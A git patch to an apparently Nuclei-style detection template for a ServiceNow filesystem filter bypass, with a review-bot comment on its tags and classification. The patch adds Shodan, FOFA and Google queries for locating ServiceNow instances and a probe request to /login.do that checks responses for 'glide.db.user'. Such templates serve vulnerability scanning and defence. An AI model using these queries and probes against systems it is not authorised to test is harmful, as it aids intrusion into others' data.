From 20cb50d9f3104c9e48b855b2b62b9aa9489b695a Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Thu, 11 Jul 2024 12:43:50 +0530
Subject: [PATCH] minor-update
---
 .../servicenow-filesystem-bypass.yaml | 32 +++++++++++++++++--
 1 file changed, 29 insertions(+), 3 deletions(-)
diff --git a/http/misconfiguration/servicenow-filesystem-bypass.yaml b/http/misconfiguration/servicenow-filesystem-bypass.yaml
index 13c1ab80ca..77ef0440cd 100644
--- a/http/misconfiguration/servicenow-filesystem-bypass.yaml
+++ b/http/misconfiguration/servicenow-filesystem-bypass.yaml
@@ -4,16 +4,42 @@ info:
 name: Service Now - Filesystem Filter Bypass
 author: DhiyaneshDk
 severity: high
+ reference:
+ - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data
+ classification:
+ cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: servicenow
+ product: servicenow
+ shodan-query:
+ - http.favicon.hash:1701804003
+ - http.title:"servicenow"
+ fofa-query:
+ - icon_hash=1701804003
+ - title="servicenow"
+ google-query: intitle:"servicenow"
+ tags: cve,cve2024,servicenow,rce
 http:
 - raw:
 - |
- GET /login.do?jvar_page_title= HTTP/1.1
+ GET /login.do?jvar_page_title= HTTP/1.1
 Host: {{Hostname}}
-
+
 matchers-condition: and
 matchers:
 - type: word
 part: body
 words:
- 'db.user'
+ - "glide.db.user"
+
+ - type: word
+ part: header
+ words:
+ - 'text/html'
+
+ - type: status
+ status:
+ - 200
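Review bot: The added `tags: cve,cve2024,servicenow,rce` line labels this as a CVE template, but the new `classification:` block carries only a `cpe` and no `cve-id`, and the file stays under `http/misconfiguration/`. Anyone filtering scans or triaging results by CVE gets a high-severity hit that cannot be mapped to an advisory or a fixed release. Either add `cve-id: <CVE-ID from the vendor advisory>` under `classification:` and file the template with the other CVE checks, or drop `cve,cve2024` from the tags. The `rce` tag also looks broader than what the matchers establish: they confirm only that `glide.db.user` appears in a 200 `text/html` response, which reads as a configuration disclosure. The `info:` block starts above the hunk, but no `description` or `remediation` is visible between `severity` and `http:`; a short one of each would help whoever receives the finding.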